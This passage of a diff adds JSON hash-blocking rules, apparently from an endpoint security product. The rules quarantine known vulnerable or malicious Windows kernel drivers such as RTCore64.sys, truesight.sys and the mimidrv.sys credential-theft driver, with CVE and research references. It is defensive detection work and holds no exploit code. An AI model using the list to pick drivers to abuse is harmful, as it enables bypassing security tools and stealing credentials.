+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8360097e-3230-5dff-b5d2-c72120081da4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611601Z",
+ "creation_date": "2026-03-23T11:45:29.611603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ce4a30668938fb7785c9958772e3c171af320ecfea8fc298160e80fbf80fb73",
+ "comment": "CPUID CPU-Z vulnerable driver (aka 
cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8360b943-3852-55e4-a030-f7ec7a7d0b8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824636Z",
+ "creation_date": "2026-03-23T11:45:30.824639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fac6ae01d22d719a4f0cc2b9c761c1a81009ce9ebe7e47b96c8ebf32b810d219",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83785a38-cded-55b0-8bc5-3a6304e50edb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": 
"2026-03-23T11:45:31.500628Z",
+ "creation_date": "2026-03-23T11:45:31.500631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77b849bca8645b152d5f432dfa504d3ea82f6512bdcdaa2db4db0ecbba55da85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "837d341b-8f99-5ce8-b3fd-cafc1ac3cb24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622845Z",
+ "creation_date": "2026-03-23T11:45:29.622847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8492a553ee840235fd12fa47b6caf1e5a8c82c3f4b681921246d7f192ed9126",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash 
SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8383dda2-a77c-51b0-9a4e-2cf40e70d555",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145695Z",
+ "creation_date": "2026-03-23T11:45:31.145697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28eb2875b5190910d71d53955f348b9a2b2b713cea5d873b619fcdcad6c5b5d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83969ff2-f4a7-5ae5-993b-99905f623882",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607434Z",
+ "creation_date": "2026-03-23T11:45:29.607436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ 
"quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0466dac557ee161503f5dfbd3549f81ec760c3d6c7c4363a21a03e7a3f66aca8",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8398fe1b-53c4-5b3e-81cd-ce567fd37f28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975786Z",
+ "creation_date": "2026-03-23T11:45:29.975788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98636f857235fb66122296db147cd29440de681a29bbd631fc94373da31f99fa",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83a108ea-13c6-58cd-a303-b27fbcaec527",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832747Z",
+ "creation_date": "2026-03-23T11:45:30.832749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7862001824edd94941d6ee2be998c9debf2d50e06b93f0abe54241c6b4a1d51f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83b1e3c4-f372-5fdd-837c-1b6c7ca15ce2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978703Z",
+ "creation_date": "2026-03-23T11:45:29.978705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": 
"2026-03-23T11:45:29.978710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960",
+ "comment": "Vulnerable Kernel Driver (aka PanIO.sys) [https://www.loldrivers.io/drivers/5f70bde4-9f81-44a8-9d3e-c6c7cf65bfae/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83b9ac6d-cf98-515e-82f2-7d421574deaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150634Z",
+ "creation_date": "2026-03-23T11:45:31.150636Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f77034fb1a3d4a0d4cf23acf0753f0fb0349b82ec4be40290cb3f43e53352e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83c4f723-f120-5000-b16c-77721fc6d51e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468746Z", + "creation_date": "2026-03-23T11:45:30.468749Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468757Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "002616bfe5bf3b13868d649d74ffe748317e3b0b33de8b9008683c906a0cae83", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "83d6c271-341d-5da8-a775-7e5ab597d583", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470072Z", + "creation_date": "2026-03-23T11:45:30.470075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ab6430b72807637cc173f174301d8411bc17ec2cb542e739d28f77eb9d47327", + "comment": 
"Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "83f25173-0739-51f5-8a45-47a36fdcec6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608120Z", + "creation_date": "2026-03-23T11:45:29.608122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608128Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a9b51770ba69c73db8fc81d50017e7ccf59dd05d3024d4c9f8ce03076ca8a7b", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "83f331b2-0899-5e23-a540-7e2d208bd1b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146746Z", + 
"creation_date": "2026-03-23T11:45:32.146748Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cba6ac0031f6ee2ea4bf8ffc7a1cffff7c4448431584f54b9a0fbec799e2466f", + "comment": "Vulnerable Kernel Driver (aka ACPIx86.sys) [https://www.loldrivers.io/drivers/fd6c52b1-aeaa-4d89-8051-91acc68c3270/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "83fbe314-ca7a-5144-a437-b029442f0342", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830000Z", + "creation_date": "2026-03-23T11:45:30.830002Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f281d9a254dee1e0a809cb71fa9355aadfc73d4777831da676e1a0d5ce9d983c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"83fe7233-0463-59c7-87a1-aadd5c7097f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822782Z", + "creation_date": "2026-03-23T11:45:30.822784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4f90ded38e11860497b9d0290bcf93a6bcb48e836b334010894a2de865b148c", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8402f38a-1832-5284-b84b-2a4efd94e8af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469233Z", + "creation_date": "2026-03-23T11:45:30.469237Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.469246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40c740c6820ddc8f01013e7354278166c090cfe5e4027be1b187cf8cbd8a6b3f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "840383ca-477d-5119-952a-c07eba4022aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609997Z", + "creation_date": "2026-03-23T11:45:29.609999Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610004Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00dfeab446afecac7b44b0b1680d5ca7d421eda243e16db8c08706bb593a8391", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84051940-b341-5d3d-b654-89f40954433c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818574Z", + "creation_date": "2026-03-23T11:45:31.818577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ba36fd2f7ee03f735164bd08a6c98621e5f9a17b63cd1ad37cad050e2a4bf80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84093ef4-c64c-57a0-9134-bbae6673e9ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815437Z", + "creation_date": "2026-03-23T11:45:31.815439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"fa38a29b4dcda0a241b94c94e0b3ce9c06c344ffe59f718d4f30671a17d22123", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "840d31fa-24d9-5d52-ba97-29264b6b263d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984070Z", + "creation_date": "2026-03-23T11:45:29.984072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984077Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca", + "comment": "Vulnerable Kernel Driver (aka VProEventMonitor.sys) [https://www.loldrivers.io/drivers/4db827b1-325b-444d-9f23-171285a4d12f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8411267b-dd5f-5a32-844d-15a4f8ec3a5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495689Z", + "creation_date": "2026-03-23T11:45:31.495691Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495696Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fec89ba7ffb18f394f1387413b7ae2165480821b565f0fdd9719c8a90c8e072", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84294827-86dd-5e91-8dcc-5191dd6e4a78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497488Z", + "creation_date": "2026-03-23T11:45:31.497491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c362c7738a6d9a3dd6329bce987ac36874574384b275c3fcf3e27cf65dfb65ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
